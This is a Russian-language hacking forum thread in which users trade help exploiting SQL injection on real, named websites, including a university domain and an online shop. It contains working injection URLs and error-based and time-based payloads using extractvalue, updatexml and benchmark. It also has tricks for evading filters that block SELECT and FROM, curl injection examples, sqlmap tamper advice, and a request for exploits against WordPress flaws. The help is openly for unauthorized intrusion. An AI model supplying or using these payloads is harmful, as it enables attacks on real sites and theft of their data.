Помогите раскрутить. Начинает фильтровать, как только FROM появляется в любом виде. Коментил, пробовал что то типа "1,2, .3from". Какие есть варианты обойти это? Code: http://onua.edu.ua/index.php?option=com_content&view=article&id=161%20and%20extractvalue(0x0a,concat(0x0a,(select%20database())))--+&Itemid=19&lang=uk
Сорри, если пишу не туда WPScan указал версию сайта 4.9.8 и вывел следуюющее: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution fixed in version 4.9.9 WordPress <= 5.0 - File Upload to XSS on Apache Web Servers fixed in version 4.9.9 WordPress <= 5.0 - User Activation Screen Search Engine Indexing fixed in version 4.9.9 WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins fixed in version 4.9.9 WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS) fixed in version 4.9.9 WordPress <= 5.0 - PHP Object Injection via Meta Data fixed in version 4.9.9 WordPress <= 5.0 - Authenticated Post Type Bypass] fixed in version 4.9.9 WordPress <= 5.0 - Authenticated File Delete fixed in version 4.9.9 Интересует конечно PHP Inj..., но эксплоитов не нашел (или плохо искал). Может кто подсказать алгоритм действий с данными уязвимостями? Спасибо.
Есть аналоги SELECT? Нашла уязвимый сайт, вставить можно только PROCEDURE ANALYSE(); Могу достать пользователя, версию, название бд. Но считать данные из таблиц не могу( Ругается на "SELECT". WAF нету!!!!
Я походу чего то не знаю, но как вытянуть пользователя, версию, название бд без SELECT через PROCEDURE ANALYSE();?
Через вектор неисполнимого запроса Error based. Time based. updatexml(1,concat(0x3A,benchmark(500000,md5(1))))
А так если по пробовать ? updatexml(1,concat(0x3A,benchmark(500000,md5(table_name from information_schema.tables limit 1,1))))
А здесь начинает уже ругаться на "FROM". Причем странно, если я оставляю только table_name или любые другие выражения не совпадающие с синтаксическими, то выходит ошибка: Даже если я с исходного запроса(тестирую локально) убираю ORDER BY, ошибка остается прежней. Могу предположить, что PROCEDURE ANALYSE() внутри тела содержит ORDER BY.
Нашла интересный факт. SELECT, FROM ставить нельзя, но можно "OR" или запятую: updatexml(1,concat(0x3A,benchmark(500000,md5(1 or 1))))
Как остановить HTTP 302 на базовую страницу при sql inj в новых версиях firefox. Раньше был NoRedirect, но сейчас его не скачать, пробовал Skip Redirect, но он тоже не дает того результата. Какие есть варианты?
curl http://target.ru/?id=sql' - пример для GET curl -d "param1=sql'¶m2=value2" -X POST http://target.ru - пример для POST curl -H "Content-Type: sql'" http://target.ru - пример для заголовков Если возникнут вопросы, то curl --help, там скрыта истина.
Добрый не подскажешь, как обходится подобный Waf? Code: pokrishkin.pro/index.php?route=product/search_auto&tab=disc&width=5&diameter=14&et=31&pcd=150&dia=67.1&manufacturer=1%22 Параметр: manufacturer На двойные кавычки реагирует вызов ошибки
Толсто. Просить раскрутить RU шоп на RU площадке, это пол ачата под цугундер подведешь. А хотя почему нет.
доброго времени суток. sql inj в GET запросе, нужно отправить простую команду: Code: SELECT id FROM #__users LIMIT 0,1 проблема, как видно, что название таблицы начинается с решётки #. пытал #__users в HEX, но выдаёт ошибку синтаксиса. что можно предпринять?
при помощи мепа тебе поможет тампер --tamper=unionalltounion и все выведет и покажет ну потом отснифаешь если руками надо